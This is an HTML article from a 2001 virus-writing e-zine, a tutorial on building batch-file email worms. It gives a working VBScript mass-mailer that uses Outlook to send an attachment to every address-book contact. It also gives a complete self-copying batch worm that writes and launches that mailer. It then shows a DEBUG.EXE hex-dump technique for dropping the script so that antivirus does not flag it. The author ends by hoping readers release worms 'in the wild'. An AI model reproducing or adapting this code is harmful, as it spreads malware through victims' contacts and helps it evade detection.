<html>
<head>
<title>rRlf #1</title>
</head>
<body text="#000000" link="#ff0000" vlink="#ff0000" alink="#ff0000" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>When the going gets weird the weird turn pro</i>
<br><table cellpadding="9">
<tr>
<th><a href="20.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="22.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>Strange Article - Adding mass mailer vbscript code to a batch file by Alco paul</u></b>
<p>This is my first time to write a tutorial.. It's lame but I hope you still read it..
<p>I've searched the web for some batch worms and found only one that made a headline, the BAT/911 worm..
<br>I've searched the net for batch worm source code capable of attaching itself in email messages and found "none" :( ..
<br>looking at the bat archive of metaphase vx group only broke my heart (I saw only batch IRC worms and file infectors).. 
<p>I pondered..
<p>Clock ticks and alas :)
<p>I think here's why..
<p>***************************************
<br>c:\>v.bat
<br>@echo off
<br>ctty nul
<br>echo on error resume next > c:\vvv.vbs  <-----------*Problem*
<br>echo < Mass Mail code > >> c:\vvv.vbs
<br>start c:\vvv.vbs
<br>***************************************
<p>When you execute the code above, it'll spawn vvv.vbs and pops an error msg
<p>"Syntax Error"
<p>Let us examine the spawned vvv.vbs:
<p>*******************
<br>c:\>type c:\vvv.vbs
<br>ON
<br>< Mass Mail code >
<br>*******************
<p>Question: Why didn't I get what I wanna get?
<p>Answer: Coz ON is a parameter of echo.
<p>*****************************************************************
<br>C:\>echo/?
<br>Displays messages, or turns command-echoing on or off.
<p>&nbsp;&nbsp;ECHO [ON | OFF]
<br>&nbsp;&nbsp;ECHO [message]
<p>Type ECHO without parameters to display the current echo setting.
<br>*****************************************************************
<p>To further demonstrate the problem, go to msdos prompt, type echo on error resume next press enter and this is what you'll get..
<p>c:\>echo on error resume next
<br>ON
<p>vvv.vbs won't run coz ON is not a valid vbs command..
<br>And for a mass mailer vbscript to run smoothly, it must contain On Error Resume Next in the beginning of the code..
<br>I speculate that this problem is the reason why most batch file vxers abandoned the email attachment idea and settled for IRC script.ini DCC send.
<p>**********************************************
<br>*Mass mailer VBScript Code.vbs (generic)
<br>on error resume next
<br>dim a,b,c,d,e
<br>set a = Wscript.CreateObject("Wscript.Shell")
<br>set b = CreateObject("Outlook.Application")
<br>set c = b.GetNameSpace("MAPI")
<br>for y = 1 To c.AddressLists.Count
<br>set d = c.AddressLists(y)
<br>x = 1
<br>set e = b.CreateItem(0)
<br>for o = 1 To d.AddressEntries.Count
<br>f = d.AddressEntries(x)
<br>e.Recipients.Add f
<br>x = x + 1
<br>next
<br>e.Subject = "your subject"
<br>e.Body = "your body"
<br>e.Attachments.Add ("worm attachment.bat")
<br>e.DeleteAfterSubmit = True
<br>e.Send
<br>f = ""
<br>next 
<br>**********************************************
<p>Solution to the problem, a dot..
<p>Yeah, a fuckin' dot.
<p>Here's a demo..
<p>***************************************
<br>c:\>v.bat
<br>@echo off
<br>ctty nul
<br>echo.on error resume next > c:\vvv.vbs  <-----------*no problemo*
<br>echo < Mass Mail code > >> c:\vvv.vbs
<br>start c:\vvv.vbs
<br>***************************************
<p>Execute v.bat you'll get no error msgs.. :)
<p>examine c:\vvv.vbs
<p>*********************
<br>c:\>type c:\vvv.vbs
<br>on error resume next
<br>< Mass Mail code >
<br>*********************
<p>For further demo, go to msdos prompt, type echo.on error resume next and this is what you'll get..
<p>c:\>echo.on error resume next
<br>on error resume next
<p>{!} Because of the dot, now ECHO doesn't consider ON as it's parameter.. :)
<p>That solves the problem..
<p>Now we're on our way to make a simple batch file worm using the GENERIC mass mailer vbscript code...
<p>*****************************************************************
<br>c:\>copy con file.bat
<br>@echo off
<br>copy %0 c:\batch.bat
<br>echo.on error resume next > c:\X.vbs
<br>echo dim a,b,c,d,e >> c:\X.vbs
<br>echo set a = Wscript.CreateObject("Wscript.Shell") >> c:\X.vbs
<br>echo set b = CreateObject("Outlook.Application") >> c:\X.vbs
<br>echo set c = b.GetNameSpace("MAPI") >> c:\X.vbs
<br>echo for y = 1 To c.AddressLists.Count >> c:\X.vbs
<br>echo set d = c.AddressLists(y) >> c:\X.vbs
<br>echo x = 1 >> c:\X.vbs
<br>echo set e = b.CreateItem(0) >> c:\X.vbs
<br>echo for o = 1 To d.AddressEntries.Count >> c:\X.vbs
<br>echo f = d.AddressEntries(x) >> c:\X.vbs
<br>echo e.Recipients.Add f >> c:\X.vbs
<br>echo x = x + 1 >> c:\X.vbs
<br>echo next >> c:\X.vbs
<br>echo e.Subject = "Hello!" >> c:\X.vbs
<br>echo e.Body = "Here's a fuckin' lame batch file worm" >> c:\X.vbs
<br>echo e.Attachments.Add ("c:\batch.bat") >> c:\X.vbs
<br>echo e.DeleteAfterSubmit = False >> c:\X.vbs
<br>echo e.Send >> c:\X.vbs
<br>echo f = "" >> c:\X.vbs
<br>echo next >> c:\X.vbs
<br>start c:\X.vbs
<br>exit
<br>^Z
<br>*****************************************************************
<p>The drawback of this technique is that av will see our batchfile worm as "New VBS" or generic "VBS"..
<p>---------------------------------------------------------------------
<p>Another way of adding vbscript routines to your batch file is by using DEBUG.EXE...
<p>I've adored Debug.exe since the good old Dos days coz it can assemble small .COM programs...
<br>I didn't have an access to TASM (until last month.. poor me :( )
<br>so I experimented with the debug, assembling programs which can destroy track 0 of diskettes, altering command.com to display "Starting MS-DOS" again and again, and other lame things..
<br>Memories, memories, memories.. Hah, enough with the nostalgia...
<p>Today, debug.exe is used by many virii and worms to drop mostly binary executables, sounds, images.. 
<p>Good news coz this'll be another way for our batch file worm to drop a vbs mailer.. :)
<p>It'll be cooler coz av won't be able to see our batch file worm as a "New VBS"..
<p>Demo:
<p>*******************************
<br>c:\>type ourvbs.vbs
<br>on error resume next
<br>b = "Add my code to your batch"
<br>MsgBox b
<br>*******************************
<p>We want to add code above in our batch file which will later be spawned as .vbs
<p>the process..
<p>Go to MS-DOS prompt
<p>********************
<br>c:\>debug ourvbs.vbs
<br>-
<br>********************
<p>First thing we'll do is to get the size of ourvbs.vbs. type RCX, enter then enter..
<p>*********************
<br>c:\>debug ourvbs.vbs
<br>-rcx
<br>< enter >
<br>CX 003F
<br>:
<br>< enter >
<br>-
<br>*********************
<p>CX 003F means that the size of the ourvbs.vbs is 003FH (hexadecimal) or 63 bytes.
<br>Computers always use hexadecimal (and binary) numbers in expressing numeric quantities.
<br>Now is not the right time to explain to you deeply what a hexadecimal number is...
<br>Consult an encyclopaedia..
<p>Next, press d and enter...
<p>************************************************************************************
<br>c:\>debug ourvbs.vbs
<br>-rcx
<br>CX 003F
<br>:
<br>< enter >
<br>-d
<br>< enter >
<br>158E:0100  6F 6E 20 65 72 72 6F 72-20 72 65 73 75 6D 65 20&nbsp;&nbsp;&nbsp;&nbsp;on error resume
<br>158E:0110  6E 65 78 74 0D 0A 62 20-3D 20 22 41 64 64 20 6D&nbsp;&nbsp;&nbsp;&nbsp;next..b = "Add m
<br>158E:0120  79 20 63 6F 64 65 20 74-6F 20 79 6F 75 72 20 62&nbsp;&nbsp;&nbsp;&nbsp;y code to your b
<br>158E:0130  61 74 63 68 22 0D 0A 4D-73 67 42 6F 78 20 62 66&nbsp;&nbsp;&nbsp;&nbsp;atch"..MsgBox bf
<br>158E:0140  CF 32 E4 A3 9E 03 1F B8-01 2E CD 21 33 ED BE 0B&nbsp;&nbsp;&nbsp;&nbsp;.2.........!3...
<br>158E:0150  00 81 C6 23 D8 8B 74 09-B3 2B BF 7B D4 E8 45 0B&nbsp;&nbsp;&nbsp;&nbsp;...#..t..+.{..E.
<br>158E:0160  F6 C7 01 75 F5 09 2E 89-CF F7 C5 04 00 75 0C 80&nbsp;&nbsp;&nbsp;&nbsp;...u.........u..
<br>158E:0170  3E 83 CF 00 74 05 C6 06-A7 D7 08 56 BE 7B D4 E8&nbsp;&nbsp;&nbsp;&nbsp;>...t......V.{..
<br>-
<br>************************************************************************************
<p>Whoa.. What the hell was that? It's the hex dump of ourvbs.vbs.. Bit complicated?
<br>Don't worry, we'll just concern ourselves with the pairs of numbers, the 6F, 6E etc..
<br>These numbers represent the characters. Look at the right of the dump..
<br>We can see the VBscript code that we want..
<p>Mission:
<p>Our goal is to get the vbscript code from this hex dump..
<p>Step 1. Add 100 to RCX.. In this case 0100 + 003F = 013F..
<br>Step 2. The sum will make us decide what to get and what to discard...
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0100 to sum will be considered.. In this case, 0100 to 013F..
<p>*****************************************************************************************************
<br>Where the heck is 13F?
<p>158E:0130 61&nbsp;&nbsp; 74&nbsp;&nbsp; 63&nbsp;&nbsp; 68&nbsp;&nbsp; 22&nbsp;&nbsp; 0D&nbsp; 0A&nbsp; 4D&nbsp; -&nbsp; 73&nbsp;&nbsp; 67&nbsp;&nbsp; 42&nbsp;&nbsp; 6F&nbsp;&nbsp; 78&nbsp;&nbsp; 20&nbsp;&nbsp; 62&nbsp;&nbsp; 66 <----013F
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;130 131 132 133 134 135 136 137&nbsp;&nbsp; 138 139 13A 13B 13C 13D 13E 13F
<p>*****************************************************************************************************
<p>Step 3. Copy and paste..
<p>******************************************************************
<p>0100  6F 6E 20 65 72 72 6F 72-20 72 65 73 75 6D 65 20
<br>0110  6E 65 78 74 0D 0A 62 20-3D 20 22 41 34 00 7D 15
<br>0120  79 20 63 6F 64 65 20 74-6F 20 79 6F 75 72 20 62
<br>0130  61 74 63 68 22 0D 0A 4D-73 67 42 6F 78 20 62 66 <----copy 0100 to 013F. discard 0140 above
<p>^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
<br>0140  CF 32 E4 A3 9E 03 1F B8-01 2E CD 21 33 ED BE 0B discard
<br>0150  00 81 C6 23 D8 8B 74 09-B3 2B BF 7B D4 E8 45 0B discard
<br>0160  F6 C7 01 75 F5 09 2E 89-CF F7 C5 04 00 75 0C 80 discard
<br>0170  3E 83 CF 00 74 05 C6 06-A7 D7 08 56 BE 7B D4 E8 discard
<p>******************************************************************
<p>Add selected dump to our batch file with additional add-ons..
<br>It's important to remove dashes between dumps.
<p>******************************************************************
<p>c:\>copy con ourbatch.bat
<br>@echo off
<br>echo.e 0100  6F 6E 20 65 72 72 6F 72 20 72 65 73 75 6D 65 20>our
<br>echo.e 0110  6E 65 78 74 0D 0A 62 20 3D 20 22 41 64 64 20 6D>>our
<br>echo.e 0120  79 20 63 6F 64 65 20 74 6F 20 79 6F 75 72 20 62>>our
<br>echo.e 0130  61 74 63 68 22 0D 0A 4D 73 67 42 6F 78 20 62 66>>our
<p>******************************************************************
<p>We need to add this to complete the process:
<p>******************************************************************
<br>echo.rcx>>our 
<br>echo.[size of the vbscript code]>>our
<br>echo.n[name].vbs>>our
<br>echo.w>>our
<br>echo.q>>our
<br>debug < our
<br>start [name].vbs
<br>******************************************************************
<p>Whalla! Simple ei..
<p>******************************************************************
<br>c:\>copy con ourbatch.bat
<br>@echo off
<br>echo.e 0100  6F 6E 20 65 72 72 6F 72 20 72 65 73 75 6D 65 20>our
<br>echo.e 0110  6E 65 78 74 0D 0A 62 20 3D 20 22 41 64 64 20 6D>>our
<br>echo.e 0120  79 20 63 6F 64 65 20 74 6F 20 79 6F 75 72 20 62>>our
<br>echo.e 0130  61 74 63 68 22 0D 0A 4D 73 67 42 6F 78 20 62 66>>our
<br>echo.rcx>>our 
<br>echo.003F>>our
<br>echo.nourvbs.vbs>>our
<br>echo.w>>our
<br>echo.q>>our
<br>debug < our
<br>start ourvbs.vbs
<br>^Z
<br>******************************************************************
<p>When ourbatch.bat is run, a message box will pop out..
<br>"Add my code to your batch"..
<p>Now I'm sure you'll be able to add a vbs mailer to your batch file worm using this technique.....
<p>So that's all.. I hope to see your batch worms in the wild.. :)
<br>&nbsp;
<br>&nbsp;
<br>&nbsp;
<br>Alcopaul
<br>&nbsp;
<br>&nbsp;
<br>12/19/2001
<br>&nbsp;
<br>&nbsp;
<br>&nbsp;
<br>Bugs found? Email me.
</body>
</html>
